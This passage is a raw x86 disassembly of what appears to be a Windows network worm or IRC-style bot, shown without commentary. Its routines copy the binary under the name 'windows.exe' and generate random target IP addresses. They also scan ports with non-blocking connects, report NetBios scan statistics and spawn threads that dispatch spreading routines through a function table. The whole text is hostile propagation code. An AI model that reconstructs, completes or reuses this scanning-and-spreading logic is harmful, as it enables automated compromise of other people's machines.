loc_40B3C0: ; CODE XREF: sub_40B2F8+54�j
; sub_40B2F8+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B2F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B3C5(int,char *Str,int)
sub_40B3C5 proc near ; CODE XREF: sub_40274D+28E2�p
Source = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+Dest]
push offset asc_432A30 ; "-"
push eax ; Dest
xor ebx, ebx
call _sprintf
cmp dword_43D878, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40B438
push esi
mov esi, offset dword_43D880
loc_40B3F8: ; CODE XREF: sub_40B3C5+70�j
cmp dword ptr [esi], 0
jbe short loc_40B42E
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+Source]
push offset asc_432A24 ; " "
push eax ; Dest
call _sprintf
push edi ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esp, 1Ch
loc_40B42E: ; CODE XREF: sub_40B3C5+36�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40B3F8
pop esi
loc_40B438: ; CODE XREF: sub_40B3C5+2B�j
push dword_4D1FD0
call sub_41D5F8
push eax
push ebx
lea eax, [ebp+Source]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax ; Dest
call _sprintf
push edi ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 38h
pop edi
pop ebx
leave
retn
sub_40B3C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B494(int,char *Str,int)
sub_40B494 proc near ; CODE XREF: sub_40274D+28CF�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, dword_4D400C
mov ecx, dword_4D4008
push esi
push dword_4D1FD0
lea esi, [ecx+eax]
call sub_41D5F8
push eax
push esi
push dword_4D400C
lea eax, [ebp+Dest]
push dword_4D4008
push offset asc_432A50 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 34h
pop esi
leave
retn
sub_40B494 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B4FF(int,char *Str,int)
sub_40B4FF proc near ; CODE XREF: sub_40274D+28BC�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push dword_4D1FD0
call sub_41D5F8
push eax
push dword_4D5258
lea eax, [ebp+Dest]
push offset asc_432A98 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 2Ch
leave
retn
sub_40B4FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B553(int,char *Str,int)
sub_40B553 proc near ; CODE XREF: sub_40274D+28A9�p
Source = byte ptr -1000h
Dest = byte ptr -800h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call __alloca_probe
push edi
lea eax, [ebp+Dest]
push offset asc_432AE4 ; "-"
push eax ; Dest
call _sprintf
cmp dword_43D878, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40B5BF
push esi
mov esi, offset aNetbios ; "NetBios"
loc_40B588: ; CODE XREF: sub_40B553+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+Source]
push offset asc_432AD4 ; " "
push eax ; Dest
call _sprintf
push edi ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40B588
pop esi
loc_40B5BF: ; CODE XREF: sub_40B553+2D�j
push dword_4D1FD0
call sub_41D5F8
push eax
lea eax, [ebp+Source]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax ; Dest
call _sprintf
push edi ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 34h
pop edi
leave
retn
sub_40B553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B619(int,char *Str,int,int)
sub_40B619 proc near ; CODE XREF: sub_40274D+2224�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B075
test eax, eax
pop ecx
jle short loc_40B655
mov eax, [ebp+arg_C]
push dword_4D1FF0[eax*8]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_432B20 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40B668
; ---------------------------------------------------------------------------
loc_40B655: ; CODE XREF: sub_40B619+13�j
lea eax, [ebp+Dest]
push offset asc_432B00 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40B668: ; CODE XREF: sub_40B619+3A�j
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 18h
leave
retn
sub_40B619 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B690(int,int,int,int,char Source,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_40B690 proc near ; CODE XREF: sub_40BEFE+51�p
var_208 = dword ptr -208h
Dest = byte ptr -204h
var_4 = byte ptr -4
Source = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
cmp eax, 0FFFFFFFFh
jz locret_40BB49
push ebx
shl eax, 6
xor ebx, ebx
cmp dword_43D884[eax], ebx
jz loc_40BB48
push esi
push 5
call sub_40B075
test eax, eax
pop ecx
jnz loc_40B90A
mov eax, dword_43C074
push edi
push 104h
mov esi, offset dword_4D470C
push esi
push ebx
mov dword_4D491C, eax
mov dword_4D4918, ebx
call ds:dword_42B00C ; GetModuleFileNameA
push 103h ; Count
mov edi, offset aWindows_exe ; "windows.exe"
push edi ; Source
push offset byte_4D4810 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4D4708, eax
mov eax, [ebp+arg_138]
mov dword_4D49A0, eax
push 7Fh ; Count
jnz short loc_40B740
lea eax, [ebp+Source]
push eax ; Source
push offset byte_4D4920 ; Dest
call _strncpy
mov dword_4D49A4, 1
jmp short loc_40B757
; ---------------------------------------------------------------------------
loc_40B740: ; CODE XREF: sub_40B690+94�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4D4920 ; Dest
call _strncpy
mov dword_4D49A4, ebx
loc_40B757: ; CODE XREF: sub_40B690+AE�j
add esp, 0Ch
push esi
push dword_4D491C
lea eax, [ebp+Dest]
push offset asc_42F298 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 5 ; int
push eax ; Source
call sub_40AE85
add esp, 1Ch
mov dword_4D4914, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4D4708
push offset sub_4146A1
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, dword_4D4914
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz loc_40B85B
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_432C40 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40B7D5: ; CODE XREF: sub_40B690+1D3�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
mov eax, dword_4D1FE4
mov [esp+208h+var_208], 104h
mov esi, offset dword_4D4464
push esi
push ebx
mov dword_4D4674, eax
mov dword_4D4670, ebx
call ds:dword_42B00C ; GetModuleFileNameA
push 103h ; Count
push edi ; Source
push offset byte_4D4568 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4D4460, eax
mov eax, [ebp+arg_138]
pop edi
mov dword_4D46F8, eax
push 7Fh ; Count
jnz short loc_40B868
lea eax, [ebp+Source]
push eax ; Source
push offset byte_4D4678 ; Dest
call _strncpy
mov dword_4D46FC, 1
jmp short loc_40B87F
; ---------------------------------------------------------------------------
loc_40B853: ; CODE XREF: sub_40B690+1D1�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40B85B: ; CODE XREF: sub_40B690+124�j
cmp dword_4D49A8, ebx
jz short loc_40B853
jmp loc_40B7D5
; ---------------------------------------------------------------------------
loc_40B868: ; CODE XREF: sub_40B690+1A7�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4D4678 ; Dest
call _strncpy
mov dword_4D46FC, ebx
loc_40B87F: ; CODE XREF: sub_40B690+1C1�j
add esp, 0Ch
push esi
push dword_4D4674
lea eax, [ebp+Dest]
push offset asc_432C0C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 4 ; int
push eax ; Source
call sub_40AE85
add esp, 1Ch
mov dword_4D466C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4D4460
push offset sub_411B17
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, dword_4D466C
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz loc_40B983
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_432BD8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40B8FD: ; CODE XREF: sub_40B690+2FB�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
loc_40B90A: ; CODE XREF: sub_40B690+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp dword_43D88C[ecx], ebx
jz loc_40BA37
push 7
call sub_40B075
test eax, eax
pop ecx
jnz loc_40BA31
cmp [ebp+arg_90], bl
mov eax, dword_4D525C
mov dword_4D43CC, eax
mov eax, [ebp+arg_110]
mov dword_4D43C0, eax
mov eax, [ebp+arg_138]
mov dword_4D43C8, ebx
mov dword_4D4450, eax
push 7Fh ; Count
jnz short loc_40B990
lea eax, [ebp+Source]
push eax ; Source
push offset byte_4D43D0 ; Dest
call _strncpy
mov dword_4D4454, 1
jmp short loc_40B9A7
; ---------------------------------------------------------------------------
loc_40B97B: ; CODE XREF: sub_40B690+2F9�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40B983: ; CODE XREF: sub_40B690+24C�j
cmp dword_4D4700, ebx
jz short loc_40B97B
jmp loc_40B8FD
; ---------------------------------------------------------------------------
loc_40B990: ; CODE XREF: sub_40B690+2CF�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4D43D0 ; Dest
call _strncpy
mov dword_4D4454, ebx
loc_40B9A7: ; CODE XREF: sub_40B690+2E9�j
add esp, 0Ch
push dword_4D43CC
lea eax, [ebp+Dest]
push offset asc_432BA8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 7 ; int
push eax ; Source
call sub_40AE85
add esp, 18h
mov dword_4D43C4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4D43C0
push offset sub_411722
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, dword_4D43C4
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz loc_40BB53
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_432B70 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40BA24: ; CODE XREF: sub_40B690+4CB�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
loc_40BA31: ; CODE XREF: sub_40B690+29B�j
mov eax, [ebp+arg_130]
loc_40BA37: ; CODE XREF: sub_40B690+28B�j
shl eax, 6
cmp dword_43D888[eax], ebx
jz loc_40BB47
push 3
call sub_40B075
test eax, eax
pop ecx
jnz loc_40BB47
push 104h
mov esi, offset byte_4D429C
push esi
push ebx
call ds:dword_42B00C ; GetModuleFileNameA
push 5Ch ; Ch
push esi ; Str
call _strrchr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40BA78
mov [eax], bl
loc_40BA78: ; CODE XREF: sub_40B690+3E4�j
mov eax, dword_43C078
mov dword_4D43A0, eax
lea eax, [ebp+Source]
push eax ; Format
push offset byte_4D4014 ; Dest
mov dword_4D43B4, ebx
call _sprintf
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ecx, [ebp+arg_138]
push esi
push dword_4D43A0
mov dword_4D43AC, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4D4010, eax
mov dword_4D43B0, ecx
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_42F220 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dest]
push 3 ; int
push eax ; Source
call sub_40AE85
add esp, 20h
mov dword_4D43A8, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4D4010
push offset sub_412DD9
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, dword_4D43A8
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_40BB68
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_432B3C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40BB3A: ; CODE XREF: sub_40B690+4E0�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
loc_40BB47: ; CODE XREF: sub_40B690+3B0�j
; sub_40B690+3C0�j
pop esi
loc_40BB48: ; CODE XREF: sub_40B690+24�j
pop ebx
locret_40BB49: ; CODE XREF: sub_40B690+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_40BB4B: ; CODE XREF: sub_40B690+4C9�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40BB53: ; CODE XREF: sub_40B690+373�j
cmp dword_4D4458, ebx
jz short loc_40BB4B
jmp loc_40BA24
; ---------------------------------------------------------------------------
loc_40BB60: ; CODE XREF: sub_40B690+4DE�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40BB68: ; CODE XREF: sub_40B690+48D�j
cmp dword_4D43BC, ebx
jz short loc_40BB60
jmp short loc_40BB3A
sub_40B690 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BB72(int Dst)
sub_40BB72 proc near ; CODE XREF: sub_40BCF3:loc_40BD57�p
Dst = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+Dst]
push 4 ; Size
lea esi, ds:4D1FF0h[esi*8]
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4441DC ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_444234 ; htonl
mov [ebp+Dst], eax
push 4 ; Size
lea eax, [ebp+Dst]
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40BB72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BBBA(char *Src,int)
sub_40BBBA proc near ; CODE XREF: sub_40BCF3+5C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+Src] ; Str
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call _strlen
cmp eax, 0Fh
pop ecx
jbe short loc_40BBE2
xor eax, eax
jmp short loc_40BC53
; ---------------------------------------------------------------------------
loc_40BBE2: ; CODE XREF: sub_40BBBA+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+Src] ; Src
call _sscanf
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40BC0F
call _rand
mov [ebp+var_C], eax
loc_40BC0F: ; CODE XREF: sub_40BBBA+4B�j
cmp [ebp+var_8], esi
jnz short loc_40BC1C
call _rand
mov [ebp+var_8], eax
loc_40BC1C: ; CODE XREF: sub_40BBBA+58�j
cmp [ebp+var_4], esi
jnz short loc_40BC29
call _rand
mov [ebp+var_4], eax
loc_40BC29: ; CODE XREF: sub_40BBBA+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40BC35
call _rand
loc_40BC35: ; CODE XREF: sub_40BBBA+74�j
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_4]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4D1FF0[ecx*8], eax
loc_40BC53: ; CODE XREF: sub_40BBBA+26�j
pop esi
leave
retn
sub_40BBBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC56 proc near ; CODE XREF: sub_40BCF3+AB�p
; sub_40C15B+5E�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40BC7F
xor eax, eax
jmp short loc_40BCEE
; ---------------------------------------------------------------------------
loc_40BC7F: ; CODE XREF: sub_40BC56+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_444260 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_444094 ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4440AC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4441B0 ; select
push esi
mov edi, eax
call dword_444218 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40BCEE: ; CODE XREF: sub_40BC56+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BC56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40BCF3 proc near ; DATA XREF: sub_40BEFE+140�o
var_31C = dword ptr -31Ch
Dest = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
Src = byte ptr -150h
var_140 = byte ptr -140h
Str = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 28Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+74h+Src]
rep movsd
mov esi, [ebp+74h+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+74h+var_28]
mov [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], eax
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
mov ebx, esi
pop ecx
imul ebx, 234h
jmp loc_40BEDA
; ---------------------------------------------------------------------------
loc_40BD41: ; CODE XREF: sub_40BCF3+1F5�j
cmp [ebp+74h+var_10], 0
push eax ; Dst
jz short loc_40BD57
lea eax, [ebp+74h+Src]
push eax ; Src
call sub_40BBBA
pop ecx
jmp short loc_40BD5C
; ---------------------------------------------------------------------------
loc_40BD57: ; CODE XREF: sub_40BCF3+53�j
call sub_40BB72
loc_40BD5C: ; CODE XREF: sub_40BCF3+62�j
pop ecx
push [ebp+74h+arg_0]
mov edi, eax
push dword_4444EC[ebx]
push [ebp+74h+var_3C]
push edi
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Dest]
push offset asc_432C9C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+74h+Dest]
push eax ; Format
lea eax, dword_4442E8[ebx]
push eax ; Dest
call _sprintf
push [ebp+74h+var_38]
push [ebp+74h+var_3C]
push edi
call sub_40BC56
add esp, 2Ch
cmp eax, 1
jnz loc_40BECF
cmp [ebp+74h+var_20], 0FFFFFFFFh
jnz short loc_40BE2A
push offset dword_4D3FF0
call ds:dword_42B070 ; RtlEnterCriticalSection
push [ebp+74h+var_3C]
push edi
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Dest]
push offset asc_432C74 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+74h+var_14], 0
jnz short loc_40BE0C
cmp [ebp+74h+Str], 0
push 1 ; int
push [ebp+74h+var_18] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
jnz short loc_40BE00
lea eax, [ebp+74h+var_140]
loc_40BE00: ; CODE XREF: sub_40BCF3+105�j
push eax ; Str
push [ebp+74h+var_40] ; int
call sub_40123B
add esp, 14h
loc_40BE0C: ; CODE XREF: sub_40BCF3+F0�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
mov [esp+2A8h+var_31C], offset dword_4D3FF0
call ds:dword_42B06C ; RtlLeaveCriticalSection
jmp loc_40BECF
; ---------------------------------------------------------------------------
loc_40BE2A: ; CODE XREF: sub_40BCF3+C0�j
push edi
call dword_444188 ; inet_ntoa
push eax ; Format
lea eax, [ebp+74h+var_208]
push eax ; Dest
call _sprintf
mov eax, [ebp+74h+var_20]
shl eax, 6
add eax, offset aNetbios_0 ; "netbios"
push eax ; Format
lea eax, [ebp+74h+var_178]
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+74h+Str], 0
lea eax, [ebp+74h+Str]
jnz short loc_40BE68
lea eax, [ebp+74h+var_140]
loc_40BE68: ; CODE XREF: sub_40BCF3+16D�j
push eax ; Format
lea eax, [ebp+74h+var_1F8]
push eax ; Dest
call _sprintf
mov eax, [ebp+74h+var_40]
mov [ebp+74h+var_20C], eax
mov eax, [ebp+74h+var_18]
mov [ebp+74h+var_15C], eax
mov eax, [ebp+74h+var_14]
pop ecx
pop ecx
mov [ebp+74h+var_158], eax
mov eax, [ebp+74h+var_3C]
sub esp, 0BCh
mov [ebp+74h+var_16C], eax
mov eax, [ebp+74h+var_20]
push 2Fh
pop ecx
mov [ebp+74h+var_168], esi
mov [ebp+74h+var_164], eax
lea esi, [ebp+74h+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call off_43D87C[eax]
mov esi, [ebp+74h+var_4]
add esp, 0BCh
loc_40BECF: ; CODE XREF: sub_40BCF3+B6�j
; sub_40BCF3+132�j
push 7D0h
call ds:dword_42B014 ; Sleep
loc_40BEDA: ; CODE XREF: sub_40BCF3+49�j
mov eax, dword_4444EC[ebx]
cmp dword_4D1FF4[eax*8], 0
jnz loc_40BD41
push esi
call sub_40B149
pop ecx
push 0
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_40BCF3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40BEFE proc near ; DATA XREF: sub_40274D+1D8F�o
; sub_40274D+5963�o
var_280 = dword ptr -280h
Source = byte ptr -1CCh
var_14C = byte ptr -14Ch
Str = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1CCh
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 53h
pop ecx
mov esi, eax
xor ebx, ebx
lea edi, [ebp+74h+var_14C]
rep movsd
inc ebx
mov [eax+144h], ebx
lea eax, [ebp+74h+var_14C]
push eax
call dword_44417C ; inet_addr
mov ecx, [ebp+74h+var_2C]
sub esp, 14Ch
mov dword_4D1FF0[ecx*8], eax
push 53h
pop ecx
lea esi, [ebp+74h+var_14C]
mov edi, esp
rep movsd
call sub_40B690
push 0Bh
call sub_40B075
add esp, 150h
cmp eax, ebx
jnz short loc_40BFD1
mov esi, offset dword_4D3FF0
push esi
call ds:dword_42B078 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_42B074 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40BFD1
lea eax, [ebp+74h+Source]
push offset asc_432D80 ; "-"
push eax ; Dest
call _sprintf
xor ebx, ebx
cmp [ebp+74h+var_10], ebx
pop ecx
pop ecx
jnz short loc_40BFB8
push ebx ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Source]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_3C] ; int
call sub_40123B
add esp, 14h
loc_40BFB8: ; CODE XREF: sub_40BEFE+9B�j
lea eax, [ebp+74h+Source]
push eax
call sub_417D70
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_40BFD1: ; CODE XREF: sub_40BEFE+65�j
; sub_40BEFE+81�j
mov eax, [ebp+74h+var_2C]
mov esi, ds:dword_42B014
mov dword_4D1FF4[eax*8], ebx
mov edi, ebx
xor ebx, ebx
cmp [ebp+74h+var_20], 1
jb loc_40C093
loc_40BFEF: ; CODE XREF: sub_40BEFE+18F�j
push edi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_14C]
push [ebp+74h+var_38]
mov [ebp+74h+var_24], edi
push eax
lea eax, [ebp+74h+Source]
push offset asc_432D4C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+74h+Source]
push 0Bh ; int
push eax ; Source
call sub_40AE85
mov ecx, [ebp+74h+var_2C]
mov [ebp+74h+var_28], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_4444EC[eax], ecx
lea eax, [ebp+74h+var_14C]
push eax
push offset sub_40BCF3
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+74h+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_40C0AA
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+Source]
push offset asc_432D14 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+74h+Source]
push eax
call sub_417D70
add esp, 10h
loc_40C085: ; CODE XREF: sub_40BEFE+1B1�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+74h+var_20]
jbe loc_40BFEF
loc_40C093: ; CODE XREF: sub_40BEFE+EB�j
cmp [ebp+74h+var_30], ebx
jz short loc_40C0B8
mov eax, [ebp+74h+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_40C0C5
; ---------------------------------------------------------------------------
loc_40C0A6: ; CODE XREF: sub_40BEFE+1AF�j
push 1Eh
call esi ; Sleep
loc_40C0AA: ; CODE XREF: sub_40BEFE+15E�j
